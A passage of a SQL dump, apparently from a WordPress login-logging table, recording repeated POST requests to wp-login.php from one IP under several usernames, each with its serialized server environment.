bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056876.848434;s:12:\"REQUEST_TIME\";i:1747056876;}}','13.127.208.15',1,'2025-05-12 19:04:38','2025-05-13 20:21:05'),(95682,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056876.8213389;s:12:\"REQUEST_TIME\";i:1747056876;}}','13.127.208.15',1,'2025-05-12 19:04:38','2025-05-13 20:21:04'),(95683,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056876.8117239;s:12:\"REQUEST_TIME\";i:1747056876;}}','13.127.208.15',1,'2025-05-12 19:04:38','2025-05-13 20:21:05'),(95684,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056876.8124499;s:12:\"REQUEST_TIME\";i:1747056876;}}','13.127.208.15',1,'2025-05-12 19:04:38','2025-05-13 20:21:04'),(95685,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747056876.8189001;s:12:\"REQUEST_TIME\";i:1747056876;}}','13.127.208.15',1,'2025-05-12 19:04:38','2025-05-13 20:21:04'),(95686,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057248.7957871;s:12:\"REQUEST_TIME\";i:1747057248;}}','13.127.208.15',1,'2025-05-12 19:10:50','2025-05-13 20:21:04'),(95687,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057248.7965741;s:12:\"REQUEST_TIME\";i:1747057248;}}','13.127.208.15',1,'2025-05-12 19:10:50','2025-05-13 20:21:05'),(95688,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057248.789299;s:12:\"REQUEST_TIME\";i:1747057248;}}','13.127.208.15',1,'2025-05-12 19:10:50','2025-05-13 20:21:04'),(95689,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057248.7982299;s:12:\"REQUEST_TIME\";i:1747057248;}}','13.127.208.15',1,'2025-05-12 19:10:51','2025-05-13 20:21:04'),(95690,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057250.587847;s:12:\"REQUEST_TIME\";i:1747057250;}}','13.127.208.15',1,'2025-05-12 19:10:52','2025-05-13 20:21:05'),(95691,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057610.7460589;s:12:\"REQUEST_TIME\";i:1747057610;}}','13.127.208.15',1,'2025-05-12 19:16:52','2025-05-13 